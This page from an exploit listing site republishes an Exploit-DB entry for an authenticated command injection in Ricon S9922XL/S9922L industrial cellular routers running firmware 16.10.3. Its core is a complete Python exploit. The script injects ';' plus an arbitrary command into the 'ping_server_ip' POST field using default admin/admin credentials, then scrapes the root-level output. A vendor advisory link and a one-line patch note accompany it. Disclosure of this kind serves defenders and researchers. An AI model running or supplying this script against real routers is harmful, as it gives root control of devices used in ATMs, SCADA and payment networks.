header-logo
Suggest Exploit
vendor:
S9922XL and S9922L
by:
LiquidWorm
7,5
CVSS
HIGH
Remote Command Execution (RCE)
78
CWE
Product Name: S9922XL and S9922L
Affected Version From: 16.10.3
Affected Version To: 16.10.3
Patch Exists: YES
Related CWE: N/A
CPE: h:ricon_mobile:s9922xl-lte
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: GNU/Linux 2.6.36 (mips), WEB-ROUTER
2021

Ricon Industrial Cellular Router S9922XL – Remote Command Execution (RCE)

The router suffers from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands as the admin (root) user via the 'ping_server_ip' POST parameter. Also vulnerable to Heartbleed.

Mitigation:

Ensure that the router is running the latest version of the firmware and that all security patches are applied.
Source

Exploit-DB raw data:

# Exploit Title: Ricon Industrial Cellular Router S9922XL - Remote Command Execution (RCE) 
# Date: 02.07.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.riconmobile.com


#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# Ricon Industrial Cellular Router S9922XL Remote Command Execution
#
#
# Vendor: Ricon Mobile Inc.
# Product web page: https://www.riconmobile.com
# Affected version: Model: S9922XL and S9922L
#                   Firmware: 16.10.3
#
# Summary: S9922L series LTE router is designed and manufactured by
# Ricon Mobile Inc., it based on 3G/LTE cellular network technology
# with industrial class quality. With its embedded cellular module,
# it widely used in multiple case like ATM connection, remote office
# security connection, data collection, etc.
#
# The S9922XL-LTE is a mobile network router based on 4G/4.5G, WiFi
# and VPN technologies. Powerful 64-bit Processor and integrated real-time
# operating system specially developed by Ricon Mobile. S9922XL is
# widely used in many areas such as intelligent transportation, scada,
# POS, industrial automation, telemetry, finance, environmental protection.
#
# Desc: The router suffers from an authenticated OS command injection
# vulnerability. This can be exploited to inject and execute arbitrary
# shell commands as the admin (root) user via the 'ping_server_ip' POST
# parameter. Also vulnerable to Heartbleed.
#
# --------------------------------------------------------------------
# C:\>python ricon.py 192.168.1.71 id
# uid=0(admin) gid=0(admin)
# --------------------------------------------------------------------
#
# Tested on: GNU/Linux 2.6.36 (mips)
#            WEB-ROUTER
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2021-5653
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5653.php
#
#
# 02.07.2021
#

import requests,sys,re

if len(sys.argv)<3:
    print("Ricon Industrial Routers RCE")
    print("Usage: ./ricon.py [ip] [cmd]")
    sys.exit(17)
else:
    ipaddr=sys.argv[1]
    execmd=sys.argv[2]

data={'submit_class'  :'admin',
      'submit_button' :'netTest',
      'submit_type'   :'',
      'action'        :'Apply',
      'change_action' :'',
      'is_ping'       :'0',
      'ping_server_ip':';'+execmd}

htreq=requests.post('http://'+ipaddr+'/apply.cgi',data=data,auth=('admin','admin'))
htreq=requests.get('http://'+ipaddr+'/asp/admin/netTest.asp',auth=('admin','admin'))
reout=re.search("20\">(.*)</textarea>",htreq.text,flags=re.S).group(1).strip('\n')
print(reout)

Navigation

Suggest Exploit

Services By CQR